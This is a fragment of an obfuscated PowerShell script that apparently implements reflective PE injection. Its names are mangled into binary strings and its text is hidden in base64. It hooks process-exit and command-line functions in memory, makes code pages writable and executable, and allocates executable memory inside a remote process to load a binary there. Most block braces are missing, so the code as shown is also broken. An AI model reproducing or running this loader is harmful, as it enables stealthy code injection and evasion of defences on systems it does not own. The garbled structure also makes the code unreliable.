throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAMwAyACAAaABhAG4AZABsAGUAIABuAHUAbABsAA==')))
[IntPtr]${01010111100101000} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAQgBhAHMAZQAuAGQAbABsAA=='))))
if (${01010111100101000} -eq [IntPtr]::Zero)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAQgBhAHMAZQAgAGgAYQBuAGQAbABlACAAbgB1AGwAbAA=')))
${10101101111001110} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(${_10110001000000101})
${00110011010001101} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi(${_10110001000000101})
[IntPtr]${00101000101010001} = $Win32Functions.GetProcAddress.Invoke(${01010111100101000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAEEA'))))
[IntPtr]${01010100011111101} = $Win32Functions.GetProcAddress.Invoke(${01010111100101000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAFcA'))))
if (${00101000101010001} -eq [IntPtr]::Zero -or ${01010100011111101} -eq [IntPtr]::Zero)
throw "GetCommandLine ptr null. GetCommandLineA: $(_00100010111110111 ${00101000101010001}). GetCommandLineW: $(_00100010111110111 ${01010100011111101})"
[Byte[]]${01101010111000110} = @()
if (${01001001001010110} -eq 8)
${01101010111000110} += 0x48
${01101010111000110} += 0xb8
[Byte[]]${00110011011111101} = @(0xc3)
${10000111101000001} = ${01101010111000110}.Length + ${01001001001010110} + ${00110011011111101}.Length
${10010010011101001} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10000111101000001})
${00000010110110101} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10000111101000001})
$Win32Functions.memcpy.Invoke(${10010010011101001}, ${00101000101010001}, [UInt64]${10000111101000001}) | Out-Null
$Win32Functions.memcpy.Invoke(${00000010110110101}, ${01010100011111101}, [UInt64]${10000111101000001}) | Out-Null
${10100010011001001} += ,(${00101000101010001}, ${10010010011101001}, ${10000111101000001})
${10100010011001001} += ,(${01010100011111101}, ${00000010110110101}, ${10000111101000001})
[UInt32]${00100111001001011} = 0
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${00101000101010001}, [UInt32]${10000111101000001}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
${10111001011001001} = ${00101000101010001}
_01011110000000101 -_00101110110110110 ${01101010111000110} -_10010100011101100 ${10111001011001001}
${10111001011001001} = _01101001110001101 ${10111001011001001} (${01101010111000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00110011010001101}, ${10111001011001001}, $false)
${10111001011001001} = _01101001110001101 ${10111001011001001} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00110011011111101} -_10010100011101100 ${10111001011001001}
$Win32Functions.VirtualProtect.Invoke(${00101000101010001}, [UInt32]${10000111101000001}, [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
[UInt32]${00100111001001011} = 0
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${01010100011111101}, [UInt32]${10000111101000001}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
${01011101101001000} = ${01010100011111101}
_01011110000000101 -_00101110110110110 ${01101010111000110} -_10010100011101100 ${01011101101001000}
${01011101101001000} = _01101001110001101 ${01011101101001000} (${01101010111000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10101101111001110}, ${01011101101001000}, $false)
${01011101101001000} = _01101001110001101 ${01011101101001000} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00110011011111101} -_10010100011101100 ${01011101101001000}
$Win32Functions.VirtualProtect.Invoke(${01010100011111101}, [UInt32]${10000111101000001}, [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
${01111011011011001} = @($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMABkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMQBkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADgAMABkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADkAMABkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMAAwAGQALgBkAGwAbAA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMQAwAGQALgBkAGwAbAA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMAAuAGQAbABsAA=='))) `
, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMQAuAGQAbABsAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADgAMAAuAGQAbABsAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADkAMAAuAGQAbABsAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMAAwAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMQAwAC4AZABsAGwA'))))
foreach (${10010000000000110} in ${01111011011011001})
[IntPtr]${00000000011101111} = $Win32Functions.GetModuleHandle.Invoke(${10010000000000110})
if (${00000000011101111} -ne [IntPtr]::Zero)
[IntPtr]${10001111001001010} = $Win32Functions.GetProcAddress.Invoke(${00000000011101111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XwB3AGMAbQBkAGwAbgA='))))
[IntPtr]${10011111110000111} = $Win32Functions.GetProcAddress.Invoke(${00000000011101111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XwBhAGMAbQBkAGwAbgA='))))
if (${10001111001001010} -eq [IntPtr]::Zero -or ${10011111110000111} -eq [IntPtr]::Zero)
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACwAIABjAG8AdQBsAGQAbgAnAHQAIABmAGkAbgBkACAAXwB3AGMAbQBkAGwAbgAgAG8AcgAgAF8AYQBjAG0AZABsAG4A')))
${10100110101111000} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi(${_10110001000000101})
${00000111001001111} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(${_10110001000000101})
${10110101111111001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10011111110000111}, [Type][IntPtr])
${10110011011000001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10001111001001010}, [Type][IntPtr])
${01011111010110101} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
${00111100100010111} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10110101111111001}, ${01011111010110101}, $false)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10110011011000001}, ${00111100100010111}, $false)
${10100010011001001} += ,(${10011111110000111}, ${01011111010110101}, ${01001001001010110})
${10100010011001001} += ,(${10001111001001010}, ${00111100100010111}, ${01001001001010110})
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${10011111110000111}, [UInt32]${01001001001010110}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10100110101111000}, ${10011111110000111}, $false)
$Win32Functions.VirtualProtect.Invoke(${10011111110000111}, [UInt32]${01001001001010110}, [UInt32](${00100111001001011}), [Ref]${00100111001001011}) | Out-Null
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${10001111001001010}, [UInt32]${01001001001010110}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00000111001001111}, ${10001111001001010}, $false)
$Win32Functions.VirtualProtect.Invoke(${10001111001001010}, [UInt32]${01001001001010110}, [UInt32](${00100111001001011}), [Ref]${00100111001001011}) | Out-Null
${10100010011001001} = @()
${01111110000011010} = @()
[IntPtr]${10100001101010010} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAGMAbwByAGUAZQAuAGQAbABsAA=='))))
if (${10100001101010010} -eq [IntPtr]::Zero)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAGMAbwByAGUAZQAgAGgAYQBuAGQAbABlACAAbgB1AGwAbAA=')))
[IntPtr]${10000101101101110} = $Win32Functions.GetProcAddress.Invoke(${10100001101010010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHIARQB4AGkAdABQAHIAbwBjAGUAcwBzAA=='))))
if (${10000101101101110} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHIARQB4AGkAdABQAHIAbwBjAGUAcwBzACAAYQBkAGQAcgBlAHMAcwAgAG4AbwB0ACAAZgBvAHUAbgBkAA==')))
${01111110000011010} += ${10000101101101110}
[IntPtr]${10001011111110101} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABQAHIAbwBjAGUAcwBzAA=='))))
if (${10001011111110101} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABQAHIAbwBjAGUAcwBzACAAYQBkAGQAcgBlAHMAcwAgAG4AbwB0ACAAZgBvAHUAbgBkAA==')))
${01111110000011010} += ${10001011111110101}
[UInt32]${00100111001001011} = 0
foreach (${10001100100010000} in ${01111110000011010})
${00111101000001010} = ${10001100100010000}
[Byte[]]${01101010111000110} = @(0xbb)
[Byte[]]${00110011011111101} = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
if (${01001001001010110} -eq 8)
[Byte[]]${01101010111000110} = @(0x48, 0xbb)
[Byte[]]${00110011011111101} = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
[Byte[]]${00100010001111001} = @(0xff, 0xd3)
${10000111101000001} = ${01101010111000110}.Length + ${01001001001010110} + ${00110011011111101}.Length + ${01001001001010110} + ${00100010001111001}.Length
[IntPtr]${01010001110101101} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABUAGgAcgBlAGEAZAA='))))
if (${01010001110101101} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABUAGgAcgBlAGEAZAAgAGEAZABkAHIAZQBzAHMAIABuAG8AdAAgAGYAbwB1AG4AZAA=')))
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${10001100100010000}, [UInt32]${10000111101000001}, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]${00100111001001011})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
${01000111100010100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10000111101000001})
$Win32Functions.memcpy.Invoke(${01000111100010100}, ${10001100100010000}, [UInt64]${10000111101000001}) | Out-Null
${10100010011001001} += ,(${10001100100010000}, ${01000111100010100}, ${10000111101000001})
_01011110000000101 -_00101110110110110 ${01101010111000110} -_10010100011101100 ${00111101000001010}
${00111101000001010} = _01101001110001101 ${00111101000001010} (${01101010111000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${_10111110001100110}, ${00111101000001010}, $false)
${00111101000001010} = _01101001110001101 ${00111101000001010} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00110011011111101} -_10010100011101100 ${00111101000001010}
${00111101000001010} = _01101001110001101 ${00111101000001010} (${00110011011111101}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${01010001110101101}, ${00111101000001010}, $false)
${00111101000001010} = _01101001110001101 ${00111101000001010} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00100010001111001} -_10010100011101100 ${00111101000001010}
$Win32Functions.VirtualProtect.Invoke(${10001100100010000}, [UInt32]${10000111101000001}, [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
echo ${10100010011001001}
Function _01000010000010111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Array[]]
${_00010001100101000},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants
[UInt32]${00100111001001011} = 0
foreach (${01000101101110001} in ${_00010001100101000})
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${01000101101110001}[0], [UInt32]${01000101101110001}[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]${00100111001001011})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
$Win32Functions.memcpy.Invoke(${01000101101110001}[0], ${01000101101110001}[1], [UInt64]${01000101101110001}[2]) | Out-Null
$Win32Functions.VirtualProtect.Invoke(${01000101101110001}[0], [UInt32]${01000101101110001}[2], [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
Function _00000001101011101
Param(
[Parameter(Position = 0, Mandatory = $true)]
[IntPtr]
${_10111111000001111},
[Parameter(Position = 1, Mandatory = $true)]
[String]
${_10100010000010100}
$Win32Types = _10100111101101101
$Win32Constants = _10101001111100001
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
if (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
return [IntPtr]::Zero
${10010100000000010} = _01101001110001101 (${_10111111000001111}) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
${10100100000000010} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010100000000010}, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
for (${01101000000100101} = 0; ${01101000000100101} -lt ${10100100000000010}.NumberOfNames; ${01101000000100101}++)
${01000101110001001} = _01101001110001101 (${_10111111000001111}) (${10100100000000010}.AddressOfNames + (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
${10100001000010100} = _01101001110001101 (${_10111111000001111}) ([System.Runtime.InteropServices.Marshal]::PtrToStructure(${01000101110001001}, [Type][UInt32]))
${01001010001100110} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${10100001000010100})
if (${01001010001100110} -ceq ${_10100010000010100})
${01011100011010100} = _01101001110001101 (${_10111111000001111}) (${10100100000000010}.AddressOfNameOrdinals + (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
${01101010001110001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${01011100011010100}, [Type][UInt16])
${00110010111101111} = _01101001110001101 (${_10111111000001111}) (${10100100000000010}.AddressOfFunctions + (${01101010001110001} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
${10100011011001011} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00110010111101111}, [Type][UInt32])
return _01101001110001101 (${_10111111000001111}) (${10100011011001011})
return [IntPtr]::Zero
Function _00111010101101100
Param(
[Parameter( Position = 0, Mandatory = $true )]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $false)]
[String]
${_01011011000001101},
[Parameter(Position = 2, Mandatory = $false)]
[IntPtr]
${_10010001100101011},
[Parameter(Position = 3)]
[Bool]
${_00100110100011000} = $false
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
$Win32Constants = _10101001111100001
$Win32Functions = _01011100100111011
$Win32Types = _10100111101101101
${01101001000001101} = $false
if ((${_10010001100101011} -ne $null) -and (${_10010001100101011} -ne [IntPtr]::Zero))
${01101001000001101} = $true
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAdABpAG4AZwAgAGIAYQBzAGkAYwAgAFAARQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAGYAcgBvAG0AIAB0AGgAZQAgAGYAaQBsAGUA')))
${_00110100101000100} = _01110011101110110 -_00000000110100000 ${_00000000110100000} -Win32Types $Win32Types
${_10110001101101110} = ${_00110100101000100}.OriginalImageBase
${10111101111001110} = $true
if (([Int] ${_00110100101000100}.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAaQBzACAAbgBvAHQAIABjAG8AbQBwAGEAdABpAGIAbABlACAAdwBpAHQAaAAgAEQARQBQACwAIABtAGkAZwBoAHQAIABjAGEAdQBzAGUAIABpAHMAcwB1AGUAcwA='))) -WarningAction Continue
${10111101111001110} = $false
${01011110010011000} = $true
if (${01101001000001101} -eq $true)
${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
${01111011110110011} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBzAFcAbwB3ADYANABQAHIAbwBjAGUAcwBzAA=='))))
if (${01111011110110011} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAbABvAGMAYQB0AGUAIABJAHMAVwBvAHcANgA0AFAAcgBvAGMAZQBzAHMAIABmAHUAbgBjAHQAaQBvAG4AIAB0AG8AIABkAGUAdABlAHIAbQBpAG4AZQAgAGkAZgAgAHQAYQByAGcAZQB0ACAAcAByAG8AYwBlAHMAcwAgAGkAcwAgADMAMgBiAGkAdAAgAG8AcgAgADYANABiAGkAdAA=')))
[Bool]${00010100100111100} = $false
${01100111110111001} = $Win32Functions.IsWow64Process.Invoke(${_10010001100101011}, [Ref]${00010100100111100})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEkAcwBXAG8AdwA2ADQAUAByAG8AYwBlAHMAcwAgAGYAYQBpAGwAZQBkAA==')))
if ((${00010100100111100} -eq $true) -or ((${00010100100111100} -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
${01011110010011000} = $false
${00000101100111010} = $true
if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
${00000101100111010} = $false
if (${00000101100111010} -ne ${01011110010011000})
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAaABlAGwAbAAgAG0AdQBzAHQAIABiAGUAIABzAGEAbQBlACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUAIAAoAHgAOAA2AC8AeAA2ADQAKQAgAGEAcwAgAFAARQAgAGIAZQBpAG4AZwAgAGwAbwBhAGQAZQBkACAAYQBuAGQAIAByAGUAbQBvAHQAZQAgAHAAcgBvAGMAZQBzAHMA')))
if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
${01011110010011000} = $false
if (${01011110010011000} -ne ${_00110100101000100}.PE64Bit)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAcABsAGEAdABmAG8AcgBtACAAZABvAGUAcwBuACcAdAAgAG0AYQB0AGMAaAAgAHQAaABlACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUAIABvAGYAIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMAIABpAHQAIABpAHMAIABiAGUAaQBuAGcAIABsAG8AYQBkAGUAZAAgAGkAbgAgACgAMwAyAC8ANgA0AGIAaQB0ACkA')))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBsAGwAbwBjAGEAdABpAG4AZwAgAG0AZQBtAG8AcgB5ACAAZgBvAHIAIAB0AGgAZQAgAFAARQAgAGEAbgBkACAAdwByAGkAdABlACAAaQB0AHMAIABoAGUAYQBkAGUAcgBzACAAdABvACAAbQBlAG0AbwByAHkA')))
[IntPtr]${00111111000110001} = [IntPtr]::Zero
${00110100101001110} = ([Int] ${_00110100101000100}.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
if ((-not ${_00100110100011000}) -and (-not ${00110100101001110}))
Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZgBpAGwAZQAgAGIAZQBpAG4AZwAgAHIAZQBmAGwAZQBjAHQAaQB2AGUAbAB5ACAAbABvAGEAZABlAGQAIABpAHMAIABuAG8AdAAgAEEAUwBMAFIAIABjAG8AbQBwAGEAdABpAGIAbABlAC4AIABJAGYAIAB0AGgAZQAgAGwAbwBhAGQAaQBuAGcAIABmAGEAaQBsAHMALAAgAHQAcgB5ACAAcgBlAHMAdABhAHIAdABpAG4AZwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABhAG4AZAAgAHQAcgB5AGkAbgBnACAAYQBnAGEAaQBuACAATwBSACAAdAByAHkAIAB1AHMAaQBuAGcAIAB0AGgAZQAgAC0ARgBvAHIAYwBlAEEAUwBMAFIAIABmAGwAYQBnACAAKABjAG8AdQBsAGQAIABjAGEAdQBzAGUAIABjAHIAYQBzAGgAZQBzACkA'))) -WarningAction Continue
[IntPtr]${00111111000110001} = ${_10110001101101110}
elseif (${_00100110100011000} -and (-not ${00110100101001110}))
{
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZgBpAGwAZQAgAGQAbwBlAHMAbgAnAHQAIABzAHUAcABwAG8AcgB0ACAAQQBTAEwAUgAgAGIAdQB0ACAALQBGAG8AcgBjAGUAQQBTAEwAUgAgAGkAcwAgAHMAZQB0AC4AIABGAG8AcgBjAGkAbgBnACAAQQBTAEwAUgAgAG8AbgAgAHQAaABlACAAUABFACAAZgBpAGwAZQAuACAAVABoAGkAcwAgAGMAbwB1AGwAZAAgAHIAZQBzAHUAbAB0ACAAaQBuACAAYQAgAGMAcgBhAHMAaAAuAA==')))
}
if (${_00100110100011000} -and ${01101001000001101})
{
Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIAB1AHMAZQAgAEYAbwByAGMAZQBBAFMATABSACAAdwBoAGUAbgAgAGwAbwBhAGQAaQBuAGcAIABpAG4AIAB0AG8AIABhACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAC4A'))) -ErrorAction Stop
}
if (${01101001000001101} -and (-not ${00110100101001110}))
{
Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAZABvAGUAcwBuACcAdAAgAHMAdQBwAHAAbwByAHQAIABBAFMATABSAC4AIABDAGEAbgBuAG8AdAAgAGwAbwBhAGQAIABhACAAbgBvAG4ALQBBAFMATABSACAAUABFACAAaQBuACAAdABvACAAYQAgAHIAZQBtAG8AdABlACAAcAByAG8AYwBlAHMAcwA='))) -ErrorAction Stop
}
${_10111111000001111} = [IntPtr]::Zero
${00001111011100111} = [IntPtr]::Zero
if (${01101001000001101} -eq $true)
${_10111111000001111} = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
${00001111011100111} = $Win32Functions.VirtualAllocEx.Invoke(${_10010001100101011}, ${00111111000110001}, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
if (${00001111011100111} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIABtAGUAbQBvAHIAeQAgAGkAbgAgAHQAaABlACAAcgBlAG0AbwB0AGUAIABwAHIAbwBjAGUAcwBzAC4AIABJAGYAIAB0AGgAZQAgAFAARQAgAGIAZQBpAG4AZwAgAGwAbwBhAGQAZQBkACAAZABvAGUAcwBuACcAdAAgAHMAdQBwAHAAbwByAHQAIABBAFMATABSACwAIABpAHQAIABjAG8AdQBsAGQAIABiAGUAIAB0AGgAYQB0ACAAdABoAGUAIAByAGUAcQB1AGUAcwB0AGUAZAAgAGIAYQBzAGUAIABhAGQAZAByAGUAcwBzACAAbwBmACAAdABoAGUAIABQAEUAIABpAHMAIABhAGwAcgBlAGEAZAB5ACAAaQBuACAAdQBzAGUA')))
if (${10111101111001110} -eq $true)
${_10111111000001111} = $Win32Functions.VirtualAlloc.Invoke(${00111111000110001}, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
${_10111111000001111} = $Win32Functions.VirtualAlloc.Invoke(${00111111000110001}, [UIntPtr]${_00110100101000100}.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
${00001111011100111} = ${_10111111000001111}
[IntPtr]${01100100110010111} = _01101001110001101 (${_10111111000001111}) ([Int64]${_00110100101000100}.SizeOfImage)
if (${_10111111000001111} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGwAbABvAGMAIABmAGEAaQBsAGUAZAAgAHQAbwAgAGEAbABsAG8AYwBhAHQAZQAgAG0AZQBtAG8AcgB5ACAAZgBvAHIAIABQAEUALgAgAEkAZgAgAFAARQAgAGkAcwAgAG4AbwB0ACAAQQBTAEwAUgAgAGMAbwBtAHAAYQB0AGkAYgBsAGUALAAgAHQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAHQAaABlACAAcwBjAHIAaQBwAHQAIABpAG4AIABhACAAbgBlAHcAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAcAByAG8AYwBlAHMAcwAgACgAdABoAGUAIABuAGUAdwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABwAHIAbwBjAGUAcwBzACAAdwBpAGwAbAAgAGgAYQB2AGUAIABhACAAZABpAGYAZgBlAHIAZQBuAHQAIABtAGUAbQBvAHIAeQAgAGwAYQB5AG8AdQB0ACwAIABzAG8AIAB0AGgAZQAgAGEAZABkAHIAZQBzAHMAIAB0AGgAZQAgAFAARQAgAHcAYQBuAHQAcwAgAG0AaQBnAGgAdAAgAGIAZQAgAGYAcgBlAGUAKQAuAA==')))
[System.Runtime.InteropServices.Marshal]::Copy(${_00000000110100000}, 0, ${_10111111000001111}, ${_00110100101000100}.SizeOfHeaders) | Out-Null
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAdABpAG4AZwAgAGQAZQB0AGEAaQBsAGUAZAAgAFAARQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAGYAcgBvAG0AIAB0AGgAZQAgAGgAZQBhAGQAZQByAHMAIABsAG8AYQBkAGUAZAAgAGkAbgAgAG0AZQBtAG8AcgB5AA==')))
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
